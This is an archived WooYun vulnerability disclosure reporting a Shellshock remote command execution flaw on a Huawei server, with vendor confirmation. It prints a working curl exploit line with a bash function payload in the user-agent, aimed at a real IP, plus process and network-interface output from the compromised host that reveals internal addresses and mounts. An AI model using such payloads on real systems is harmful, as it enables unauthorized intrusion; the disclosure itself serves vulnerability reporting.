当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113282

漏洞标题:华为某服务器存在远程命令执行漏洞

相关厂商:华为技术有限公司

漏洞作者: 猪猪侠

提交时间:2015-05-10 19:08

修复时间:2015-06-24 22:40

公开时间:2015-06-24 22:40

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-10: 细节已通知厂商并且等待厂商处理中
2015-05-10: 厂商已经确认,细节仅向厂商公开
2015-05-20: 细节向核心白帽子及相关领域专家公开
2015-05-30: 细节向普通白帽子公开
2015-06-09: 细节向实习白帽子公开
2015-06-24: 细节向公众公开

简要描述:

华为某服务器存在远程命令执行漏洞

详细说明:

curl http://122.11.38.69:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k

UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0  2012 ?        00:10:41 init [3]           
root         2     0  0  2012 ?        00:00:00 [kthreadd]
root         3     2  0  2012 ?        00:00:35 [migration/0]
root         4     2  0  2012 ?        00:02:56 [ksoftirqd/0]
root         5     2  0  2012 ?        00:21:44 [events/0]
root         6     2  0  2012 ?        00:00:00 [cpuset]
root         7     2  0  2012 ?        00:00:00 [khelper]
root         8     2  0  2012 ?        00:00:00 [netns]
root         9     2  0  2012 ?        00:00:00 [async/mgr]
root        10     2  0  2012 ?        00:00:00 [pm]
root        11     2  0  2012 ?        00:00:00 [xenwatch]
root        12     2  0  2012 ?        00:00:00 [xenbus]
root        14     2  0  2012 ?        00:00:54 [migration/1]
root        15     2  0  2012 ?        00:01:11 [ksoftirqd/1]
root        16     2  0  2012 ?        00:22:34 [events/1]
root        17     2  0  2012 ?        00:00:50 [migration/2]
root        18     2  0  2012 ?        00:01:30 [ksoftirqd/2]
root        19     2  0  2012 ?        00:27:36 [events/2]
root        20     2  0  2012 ?        00:00:44 [migration/3]
root        21     2  0  2012 ?        00:00:56 [ksoftirqd/3]
root        22     2  0  2012 ?        01:27:20 [events/3]
root        23     2  0  2012 ?        00:01:27 [sync_supers]
root        24     2  0  2012 ?        00:01:42 [bdi-default]
root        25     2  0  2012 ?        00:00:00 [kintegrityd/0]
root        26     2  0  2012 ?        00:00:00 [kintegrityd/1]
root        27     2  0  2012 ?        00:00:00 [kintegrityd/2]
root        28     2  0  2012 ?        00:00:00 [kintegrityd/3]
root        29     2  0  2012 ?        00:00:00 [kblockd/0]
root        30     2  0  2012 ?        00:00:00 [kblockd/1]
root        31     2  0  2012 ?        00:00:00 [kblockd/2]
root        32     2  0  2012 ?        00:00:00 [kblockd/3]
root        33     2  0  2012 ?        00:00:00 [kseriod]
root        38     2  0  2012 ?        00:00:00 [khungtaskd]
root        39     2  0  2012 ?        00:00:00 [kswapd0]
root        40     2  0  2012 ?        00:00:00 [aio/0]
root        41     2  0  2012 ?        00:00:00 [aio/1]
root        42     2  0  2012 ?        00:00:00 [aio/2]
root        43     2  0  2012 ?        00:00:00 [aio/3]
root        44     2  0  2012 ?        00:00:00 [crypto/0]
root        45     2  0  2012 ?        00:00:00 [crypto/1]
root        46     2  0  2012 ?        00:00:00 [crypto/2]
root        47     2  0  2012 ?        00:00:00 [crypto/3]
root        49     2  0  2012 ?        00:00:00 [kpsmoused]
root        50     2  0  2012 ?        00:00:00 [xenfb thread]
root       153     2  0  2012 ?        00:00:00 [net_accel/0]
root       154     2  0  2012 ?        00:00:00 [net_accel/1]
root       155     2  0  2012 ?        00:00:00 [net_accel/2]
root       156     2  0  2012 ?        00:00:00 [net_accel/3]
root       459     2  0  2012 ?        00:03:43 [kjournald]
root       530     1  0  2012 ?        00:00:00 /sbin/udevd --daemon
root       865     2  0  2012 ?        00:00:00 [kstriped]
root       949     2  0  2012 ?        00:05:57 [kjournald]
100       1389     1  0  2012 ?        00:01:37 /bin/dbus-daemon --system
101       1460     1  0  2012 ?        00:00:26 /usr/sbin/hald --daemon=yes
root      1463     1  0  2012 ?        00:00:24 /usr/sbin/console-kit-daemon
root      1526  1460  0  2012 ?        00:00:00 hald-runner
root      3290     1  0  2013 ?        00:00:00 bash -c umount  -l  /opt/huawei/ttgo/file/fileup ; umount -l /opt/huawei/ttgo/file
root      3314  3290  0  2013 ?        00:00:15 umount -l /opt/huawei/ttgo/file/fileup
root      3320     1  0  2013 ?        00:00:13 df -h
root      3369     1  0  2013 ?        00:00:00 bash -c umount  -l  /opt/huawei/ttgo/file/fileup ; umount -l /opt/huawei/ttgo/file
root      3393  3369  0  2013 ?        00:00:00 umount -l /opt/huawei/ttgo/file/fileup
root      3565     1  0  2013 ?        00:00:00 sh /etc/init.d/boot.local
root      3590  3565  0  2013 ?        00:00:00 mount 10.11.121.206:/opt/huawei/FileData_RAID10 /opt/huawei/ttgo/file/
root      3591  3590  0  2013 ?        00:00:00 /sbin/mount.nfs 10.11.121.206:/opt/huawei/FileData_RAID10 /opt/huawei/ttgo/file/ -o rw
root      3689     1  0  2012 ?        00:00:30 /sbin/auditd -s disable
root      3691  3689  0  2012 ?        00:01:15 /sbin/audispd
root      3692     2  0  2012 ?        00:00:00 [kauditd]
root      3713     1  0  2012 ?        00:01:09 /sbin/rpcbind
root      3929     1  0  2012 ?        00:00:00 /usr/sbin/sshd -o PidFile=/var/run/sshd.init.pid
root      3968     1  0  2012 ?        02:02:08 /usr/sbin/irqbalance
root      3981     1  0  2012 ?        00:08:10 /usr/sbin/nscd
root      4011     1  0  2012 ?        00:09:24 /usr/sbin/cron
root      4026     1  0  2012 tty1     00:00:00 /sbin/mingetty --noclear tty1
root      4027     1  0  2012 tty2     00:00:00 /sbin/mingetty tty2
root      4028     1  0  2012 tty3     00:00:00 /sbin/mingetty tty3
root      4029     1  0  2012 tty4     00:00:00 /sbin/mingetty tty4
root      4030     1  0  2012 tty5     00:00:00 /sbin/mingetty tty5
root      4031     1  0  2012 tty6     00:00:00 /sbin/mingetty tty6
ttgo      6092     1  0  2014 ?        21:53:16 /opt/huawei/ttgo/push/jdk/bin/java -Djava.util.logging.config.file=/opt/huawei/ttgo/push/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.endorsed.dirs=/opt/huawei/ttgo/push/tomcat/endorsed -classpath /opt/huawei/ttgo/push/tomcat/bin/bootstrap.jar:/opt/huawei/ttgo/push/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/huawei/ttgo/push/tomcat -Dcatalina.home=/opt/huawei/ttgo/push/tomcat -Djava.io.tmpdir=/opt/huawei/ttgo/push/tomcat/temp org.apache.catalina.startup.Bootstrap start
root      7944     2  0  2012 ?        00:00:08 [rpciod/0]
root      7945     2  0  2012 ?        00:00:01 [rpciod/1]
root      7946     2  0  2012 ?        00:00:01 [rpciod/2]
root      7947     2  0  2012 ?        00:00:00 [rpciod/3]
root      7951     2  0  2012 ?        00:00:00 [kslowd000]
root      7952     2  0  2012 ?        00:00:00 [kslowd001]
root      7955     2  0  2012 ?        00:00:00 [nfsiod]
root     10152     2  0  2012 ?        00:00:04 [kjournald]
root     10836     1  0  2014 ?        00:02:02 /sbin/syslog-ng
root     10839     1  0  2014 ?        00:00:00 /sbin/klogd -c 1 -x
ttgo     11297 11463  0 17:51 ?        00:00:00 /opt/huawei/ttgo/push/cloudServer/apache/bin/httpd -k start -f /opt/huawei/ttgo/push/cloudServer/apache/conf/httpd.conf
ttgo     11463     1  0  2012 ?        01:56:36 /opt/huawei/ttgo/push/cloudServer/apache/bin/httpd -k start -f /opt/huawei/ttgo/push/cloudServer/apache/conf/httpd.conf
ttgo     11466 11463  0  2012 ?        00:00:00 /opt/huawei/ttgo/push/cloudServer/apache/bin/httpd -k start -f /opt/huawei/ttgo/push/cloudServer/apache/conf/httpd.conf
root     12243     2  0 18:48 ?        00:00:00 [flush-202:16]
ttgo     12249 11466  0 18:48 ?        00:00:00 /bin/sh /opt/huawei/ttgo/push/cloudServer/apache/cgi-bin/test-cgi
ttgo     12250 12249  0 18:48 ?        00:00:00 /bin/ps -ef
root     16017     1  0  2012 ?        00:00:00 rpc.statd --no-notify
root     16026     2  0  2012 ?        00:00:00 [lockd]
zabbix   21920     1  0  2013 ?        00:00:00 /opt/zabbix/sbin/zabbix_agentd
zabbix   21921 21920  0  2013 ?        11:56:03 /opt/zabbix/sbin/zabbix_agentd
zabbix   21922 21920  0  2013 ?        00:24:17 /opt/zabbix/sbin/zabbix_agentd
zabbix   21923 21920  0  2013 ?        00:24:17 /opt/zabbix/sbin/zabbix_agentd
zabbix   21924 21920  0  2013 ?        00:24:16 /opt/zabbix/sbin/zabbix_agentd
zabbix   21925 21920  0  2013 ?        09:52:21 /opt/zabbix/sbin/zabbix_agentd
root     22136     1  0  2012 ?        00:00:00 /sbin/agetty -L 9600 xvc0 xterm
root     22368     2  0  2012 ?        00:10:55 [flush-202:0]
ntp      23389     1  0  2012 ?        00:45:34 /usr/sbin/ntpd -p /var/run/ntp/ntpd.pid -g -u ntp:ntp -i /var/lib/ntp -c /etc/ntp.conf
root     31936     1  0  2013 ?        00:00:13 /var/ossec/bin/ossec-execd
ossec    31940     1  0  2013 ?        00:26:07 /var/ossec/bin/ossec-agentd
root     31944     1  0  2013 ?        00:14:32 /var/ossec/bin/ossec-logcollector
root     31948     1  0  2013 ?        2-04:11:29 /var/ossec/bin/ossec-syscheckd

漏洞证明:

eth0      Link encap:Ethernet  HWaddr 00:16:3E:0B:20:70  
          inet addr:10.11.32.112  Bcast:10.11.32.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:622434337 errors:0 dropped:0 overruns:0 frame:0
          TX packets:405783654 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:51098113331 (48730.9 Mb)  TX bytes:32920068898 (31395.0 Mb)
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:362 errors:0 dropped:0 overruns:0 frame:0
          TX packets:362 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:33120 (32.3 Kb)  TX bytes:33120 (32.3 Kb)

修复方案:

删除

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-10 22:38

厂商回复:

猪猪侠大名啊。感谢你的提醒。

最新状态:

暂无